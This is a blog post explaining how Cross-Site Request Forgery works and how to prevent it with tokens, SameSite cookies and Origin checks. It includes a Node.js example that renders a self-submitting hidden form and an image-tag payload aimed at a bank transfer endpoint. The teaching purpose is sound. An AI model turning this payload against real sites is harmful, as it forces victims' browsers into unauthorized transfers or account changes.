May 11, 2026 admin
How a CSRF Attack Works
What is CSRF?
Cross-Site Request Forgery (CSRF) is a web attack that makes a victim's browser send a request the victim never intended, using the victim's existing login.
It exploits the fact that a browser attaches a site's cookies to every request it sends to that site, whatever page started the request, so a site that authenticates by cookie alone cannot tell a forged request from a legitimate one.
Real-World CSRF Attack Example
1. User Logs Into a Trusted Website
Alice logs into her online banking account at bank.com. The server sets a session cookie, and her browser sends that cookie with every subsequent request to bank.com, so she stays authenticated while browsing.
2. Attacker Creates a Malicious Website
Mallory, the attacker, builds a webpage that contains a hidden request to bank.com, for example an image tag whose source points at the bank's transfer endpoint, or an invisible form that submits itself as soon as the page loads. Instead of loading a normal image, the request asks bank.com to transfer money from Alice's account to Mallory's.
3. Alice Visits the Malicious Website
Mallory tricks Alice into opening the malicious webpage through a phishing email, social media link, or advertisement.
4. Browser Sends the Request Automatically
When Alice opens the page, her browser sends the hidden request to bank.com and, because the request is addressed to bank.com, attaches Alice's session cookie to it.
The request really does come from Alice's browser and carries her valid session, so the banking server cannot distinguish it from a request Alice made herself and treats it as legitimate.
5. Unauthorized Action Happens
The bank processes the request and transfers money to Mallory's account without Alice's knowledge. Mallory never sees the bank's response (the browser's same-origin policy keeps it from her page), but she does not need to: the damage is done when the request is processed.
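The five steps above, as an added example that is not part of the original post: a small Node.js model of Mallory's page and of what the browser does with it. The endpoint (`/transfer`), the form field names, the hostnames and the cookie value are assumptions made for the illustration, and the cookie jar is constructed inline; the browser model assumes the cookie was set without a SameSite attribute, which was the default in browsers before that attribute existed.

```javascript
// Added example, not the original post's code. Hostnames, endpoint, field
// names and the cookie value are assumptions for illustration.

// Step 2: the request Mallory wants Alice's browser to make, expressed as the
// form she embeds in her page.
const forgedForm = {
  action: 'https://bank.com/transfer',
  method: 'POST',
  fields: { to: 'mallory', amount: '1000' },
};

// The HTML Mallory hosts: an invisible form that submits itself as soon as
// the page loads, so Alice does not have to click anything.
function renderAttackPage(form) {
  const inputs = Object.entries(form.fields)
    .map(([name, value]) => `<input type="hidden" name="${name}" value="${value}">`)
    .join('\n    ');
  return `<!doctype html>
<html><body onload="document.forms[0].submit()">
  <form action="${form.action}" method="${form.method}" style="display:none">
    ${inputs}
  </form>
</body></html>`;
}

// Variant for endpoints that change state on GET: a plain <img> tag is
// enough, because the browser fetches its src with the target's cookies.
function renderImageVariant(form) {
  const qs = new URLSearchParams(form.fields).toString();
  return `<img src="${form.action}?${qs}" width="1" height="1" alt="">`;
}

// Step 1: cookies the browser stored for bank.com when Alice logged in
// (constructed sample data).
const cookieJar = new Map([['bank.com', { session: 'alice-session-id' }]]);

// Step 4: what the browser does when the attacker's page submits the form.
// It builds a request to the form's action and, with no SameSite restriction
// on the cookie, attaches every cookie it holds for that host, even though the
// initiating page is on a different site. It also adds an Origin header
// naming the initiating site; whether the server looks at it is up to the server.
function browserSubmit(form, jar, initiatorOrigin) {
  const target = new URL(form.action);
  const cookies = jar.get(target.hostname) || {};
  return {
    method: form.method,
    url: target.href,
    headers: {
      Cookie: Object.entries(cookies).map(([k, v]) => `${k}=${v}`).join('; '),
      Origin: initiatorOrigin,
    },
    body: form.method === 'POST' ? new URLSearchParams(form.fields).toString() : '',
  };
}

// The forged request as it reaches bank.com: Alice's session cookie is on it.
const forged = browserSubmit(forgedForm, cookieJar, 'https://evil.example');
console.log(renderAttackPage(forgedForm));
console.log(forged);
```

Note that nothing in the forged request is tampered with or stolen: the Cookie header is exactly what the browser would send for a transfer Alice initiated herself. That is why a server that checks only the cookie cannot reject it, and why the `Origin` header and an unguessable per-session token (both discussed under prevention below) are needed to tell the two apart.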
Impact of CSRF Attacks
CSRF attacks can cause serious security issues in web applications. Attackers may use them to:
- Transfer funds from user accounts
- Change passwords or email addresses
- Indirectly expose sensitive information, for example by changing the account's recovery email address and then resetting the password (a CSRF request cannot read the response itself, because the browser's same-origin policy withholds it from the attacker's page)
- Post unwanted messages or comments
- Modify account settings without permission
Common Methods to Prevent CSRF Attacks
Use Anti-CSRF Tokens
Developers can add an unpredictable, per-session (or per-form) CSRF token as a hidden field in forms and as a header on other state-changing requests. The server compares the submitted token with the one stored for the session before processing the request. If the token is missing or does not match, the request is rejected. The attacker's page cannot read the token, because it lives on bank.com and the same-origin policy keeps cross-site pages from reading bank.com's content.
Enable SameSite Cookies
The SameSite cookie attribute tells browsers not to send a cookie on cross-site requests. With SameSite=Strict the cookie is never sent cross-site; with SameSite=Lax it is still sent on top-level GET navigations (clicking a link to the site), but not on cross-site POSTs or on subresource loads such as images. A forged request that arrives without the session cookie is simply an unauthenticated request, so it cannot act on the victim's account. Because Lax still allows cross-site GETs, it protects only endpoints that do not change state on GET.
Validate User Requests
Applications should verify important actions before processing them. For example, websites can ask users to re-enter passwords or confirm transactions.
Avoid State-Changing GET Requests
Sensitive actions such as payments or password changes should use POST requests instead of GET requests, since a GET can be triggered by nothing more than an image tag or a link. Using POST alone is not a defense, though: a form can be submitted cross-site just as easily, so POST must be combined with a CSRF token or a SameSite cookie. Checking the request's Origin header against the site's own origin is a further, cheap check for state-changing requests.
Why CSRF Protection Matters
CSRF attacks target trusted user sessions and can silently perform harmful actions. Strong security measures such as CSRF tokens and SameSite cookies help developers protect user accounts and sensitive data from unauthorized access.